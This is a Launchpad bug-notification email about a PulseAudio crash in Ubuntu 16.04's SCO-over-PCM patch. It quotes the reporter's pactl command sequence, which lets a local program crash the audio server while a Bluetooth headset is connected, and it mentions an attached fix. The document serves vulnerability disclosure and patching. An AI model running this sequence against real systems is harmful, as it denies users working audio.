Hi Rachanan, Since the standard support for Ubuntu 16.04 LTS has ended, fixing this will be available in the ESM repository only. Are you still interested in us sponsoring your fix even if it is only available as an ESM update? Thanks!
-- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/2078822 Title: With Bluetooth headset connect, a malicious program can crash Pulseaudio on Ubuntu16.04 Status in pulseaudio package in Ubuntu: Confirmed Bug description: On Ubuntu 16.04, a malicious app could abuse a Bluetooth module configuration for Ubuntu Touch to crash Pulseaudio: ``` pactl unload-module module-bluez5-discover pactl load-module module-null-sink sink_name=sink.fake.sco rate=8000 channels=1 pactl load-module module-null-source source_name=source.fake.sco rate=8000 channels=1 pactl load-module module-bluez5-discover sco_sink=sink.fake.sco sco_source=source.fake.sco # Now, connect a Bluetooth headset, then: pactl list cards # Make note of Bluetooth card name. pactl set card-profile bluez_card.<address> headset_head_unit pactl set-sink-volume sink.fake.sco 69 ``` An app could repeatedly do this, preventing audio from working as long as a Bluetooth headset is still connected. This is discovered while working on a similar patch on UBports' Ubuntu Touch 20.04. Admittedly, I was not able to actually test this on Ubuntu 16.04 + ESM proper yet, but a similar set of commands is tested to be able to crash Pulseaudio on Ubuntu Touch 20.04, which carry a forward-ported version of the SCO-over-PCM patch. A patch which should fix this issue is attached. This is a problem in Ubuntu-specific SCO-over-PCM patch, and thus is not applicable in other distros. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/2078822/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
